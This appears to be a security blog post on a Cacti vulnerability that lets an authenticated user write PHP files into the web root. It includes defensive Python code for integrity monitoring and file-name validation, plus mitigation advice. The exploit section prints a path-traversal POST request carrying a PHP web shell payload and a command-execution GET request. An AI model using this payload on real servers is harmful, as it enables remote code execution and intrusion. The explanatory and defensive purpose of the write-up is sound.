Cacti (http://www.cacti.net/) is an open-source performance monitoring and fault management framework for managing network devices and reporting on their status. Cacti is popular among system administrators due to its ease of use, scalability, and extensibility. However, a recent vulnerability (CVE-2025-24367) has been discovered that allows an authenticated Cacti user to create arbitrary PHP scripts in the web root of the application, leading to remote code execution on the server. In this post, we will explore this vulnerability, provide code snippets to demonstrate its exploitation, and discuss mitigation steps. This vulnerability has been fixed in Cacti version 1.2.29.

Exploit Details

This vulnerability lies within the graph creation and graph template functionality of Cacti's web-based user interface. An authenticated user can create graphs and customize them using graph templates, but due to insufficient input validation and sanitization, it is possible for an attacker to inject arbitrary PHP code into a graph template, which then gets saved as a PHP file in the web root of the application. Once the malicious PHP file is saved in the web root, it can be accessed and executed remotely.

Here is a simplified code snippet demonstrating the exploit:

POST /cacti/graph_templates.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
...

action=save&id=&input_title=[GraphTitle] &input_file=../../../../webroot_dir/[filename].php &input_content=<?php+system($_GET['cmd']);+?>

In this HTTP POST request, we create a new graph template with the title [GraphTitle], the file named [filename].php, and the content containing a simple PHP script that executes a system command passed through the cmd GET parameter. When the server processes this request, it will create a PHP file with the specified filename and content in the web root directory, allowing the attacker to execute arbitrary commands on the server remotely.

For example, to execute the whoami command on the server, the attacker can send a GET request as follows:

GET /cacti/webroot_dir/[filename].php?cmd=whoami HTTP/1.1
Host: example.com

Upon executing this request, the server will respond with the output of the whoami command, revealing which user account the web server process runs as.
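The artifact this exploit leaves behind is an executable file under the web root that was not part of the installed release. As an added example (not part of the original post and not Cacti's own code), the following Python script builds a manifest of PHP files under a document root right after a clean install or upgrade and later diffs a fresh scan against it, so a dropped or modified script shows up. The directory layout and file names in the demo are constructed; the path webroot_dir/dropped.php only mirrors the placeholder used in the request above.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List

# Suffixes that a PHP-enabled web server will hand to the interpreter.
PHP_SUFFIXES = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large files do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_php_files(webroot: str) -> Dict[str, str]:
    """Map every executable file under webroot (as a relative POSIX path) to its SHA-256."""
    root = Path(webroot)
    manifest: Dict[str, str] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            manifest[path.relative_to(root).as_posix()] = sha256_of(path)
    return manifest


def diff_manifest(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare a known-good manifest with a fresh scan.

    'added' is the bucket that matters for the scenario in the write-up: a PHP
    file that was never part of the release has appeared under the web root.
    'modified' catches release files that were overwritten in place.
    """
    return {
        "added": sorted(name for name in current if name not in baseline),
        "modified": sorted(name for name in current
                           if name in baseline and baseline[name] != current[name]),
        "removed": sorted(name for name in baseline if name not in current),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: a clean tree, then one new PHP file and one changed file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "cacti").mkdir()
        (root / "cacti" / "index.php").write_text("<?php echo 'ok'; ?>")
        (root / "cacti" / "graph_templates.php").write_text("<?php /* release code */ ?>")
        (root / "cacti" / "README.md").write_text("not executable, so not tracked")
        baseline = scan_php_files(tmp)  # would be stored outside the web root

        # Constructed post-incident state (file names are placeholders).
        (root / "cacti" / "webroot_dir").mkdir()
        (root / "cacti" / "webroot_dir" / "dropped.php").write_text("<?php /* unexpected */ ?>")
        (root / "cacti" / "index.php").write_text("<?php echo 'changed'; ?>")
        current = scan_php_files(tmp)
        return diff_manifest(baseline, current)


if __name__ == "__main__":
    print(demo())
```

In practice the baseline would be taken with scan_php_files on the real document root immediately after installing or upgrading to a fixed release, stored somewhere the web server account cannot write, and compared on a schedule; a non-empty "added" list for a directory that should only change during upgrades is a high-signal alert. General-purpose file integrity tools such as AIDE do the same job with more coverage; the point of the script is to show which files and which change types matter for this class of bug.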

Reference to Original Discovery

The original discovery of this vulnerability can be found on the following GitHub issue: https://github.com/Cacti/cacti/issues/3702. Kudos to the researcher who discovered and responsibly reported this vulnerability, helping the Cacti project to improve its security.

Mitigation Steps

To protect against this vulnerability, Cacti has issued a fix in version 1.2.29. Users are encouraged to upgrade to this version or later. Moreover, administrators should implement proper user management, ensuring that only trusted users have access to Cacti's web-based user interface, and should adopt the following additional measures:

1. Running Cacti with the minimal required privileges.
2. Ensuring that Cacti web access is restricted to trusted networks and/or using strong authentication mechanisms.
3. Regularly updating the Cacti software and its dependencies to ensure patches for known vulnerabilities are applied.
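The write-up attributes the bug to insufficient validation of the file name and content supplied in the request, which is what lets a traversal sequence and a .php extension reach a file write under the web root. As an added example (not part of the original post and not Cacti's own code), the following Python code shows the checks a server-side save routine needs before it turns a user-supplied name into a path: rejecting any directory component, rejecting every server-executable suffix (including double extensions such as shell.php.txt), confining the resolved path to a data directory, and keeping that directory outside the document root. The DATA_DIR path, the allow-list of extensions and the sample names in demo() are assumptions chosen for the example, as are the helper names.

```python
import os
from pathlib import Path, PurePosixPath
from typing import Dict, Optional

# Hypothetical data directory for saved template files. It is deliberately
# outside the web server's document root, so nothing written here can be
# served or executed even if a later check is bypassed. (Assumed path.)
DATA_DIR = "/srv/cacti-data/templates"

# Suffixes that common PHP-enabled web servers may hand to the interpreter.
EXECUTABLE_SUFFIXES = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}

# Suffixes this endpoint legitimately needs to write (constructed allow-list).
ALLOWED_SUFFIXES = {".txt", ".xml"}


def filename_problem(user_filename: str) -> Optional[str]:
    """Return the reason a filename is unsafe, or None if it passes every check.

    The checks mirror the two weaknesses the write-up describes: a directory
    component (such as ../) in the name, and a server-executable extension.
    """
    if not user_filename or "\x00" in user_filename or "\\" in user_filename:
        return "empty name, NUL byte or backslash"
    name = PurePosixPath(user_filename)
    # A bare file name has exactly one path component; anything else means the
    # caller tried to choose a directory, which this endpoint never needs.
    if len(name.parts) != 1 or name.name in ("", ".", ".."):
        return "directory components are not allowed"
    suffixes = [s.lower() for s in name.suffixes]
    # Check every suffix, not just the last: some Apache/mod_php configurations
    # execute on any matching suffix, so shell.php.txt must be rejected too.
    if any(s in EXECUTABLE_SUFFIXES for s in suffixes):
        return "executable extension"
    if not suffixes or suffixes[-1] not in ALLOWED_SUFFIXES:
        return "extension not in allow-list"
    return None


def resolve_target(base_dir: str, user_filename: str) -> str:
    """Map a validated filename to an absolute path that provably stays inside base_dir."""
    problem = filename_problem(user_filename)
    if problem:
        raise ValueError(f"rejected {user_filename!r}: {problem}")
    base = Path(base_dir).resolve()
    target = (base / user_filename).resolve()
    # Defence in depth: even after validation, require the resolved parent to be
    # exactly the base directory (catches symlink tricks and future regressions).
    if target.parent != base:
        raise ValueError(f"rejected {user_filename!r}: escapes {base}")
    return str(target)


def save_template_file(user_filename: str, content: str, base_dir: str = DATA_DIR) -> str:
    """Write content to a validated path; O_EXCL refuses to overwrite an existing file."""
    target = resolve_target(base_dir, user_filename)
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "w") as fh:
        fh.write(content)
    return target


def demo() -> Dict[str, Optional[str]]:
    """Run the checks over constructed names, including the shape used in the write-up."""
    samples = [
        "graph_export.txt",                   # legitimate
        "../../../../webroot_dir/shell.php",  # shape of the request in the write-up
        "shell.php",                          # no traversal, still executable
        "shell.php.txt",                      # double extension
        "..",                                 # bare parent reference
    ]
    return {name: filename_problem(name) for name in samples}


if __name__ == "__main__":
    for name, problem in demo().items():
        print(f"{name!r}: {'ok' if problem is None else problem}")
```

Two design points are worth noting. The validation is an allow-list (one path component, one approved extension) rather than a deny-list of traversal strings, which is why encoded or doubled-up variants of ../ never need special handling. And the directory the file lands in is chosen by the server, never by the request: even a validation regression then produces a stray data file, not a script the web server will execute.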

Conclusion

CVE-2025-24367 is a serious vulnerability in the Cacti network performance monitoring framework that allows an authenticated user to create arbitrary PHP scripts in the web root of the application, leading to remote code execution on the server. Users should upgrade to Cacti version 1.2.29 or later to mitigate this vulnerability and follow security best practices for deploying Cacti in their environments.

Timeline

Published on: 01/27/2025 18:15:42 UTC
Last modified on: 01/27/2025 19:15:29 UTC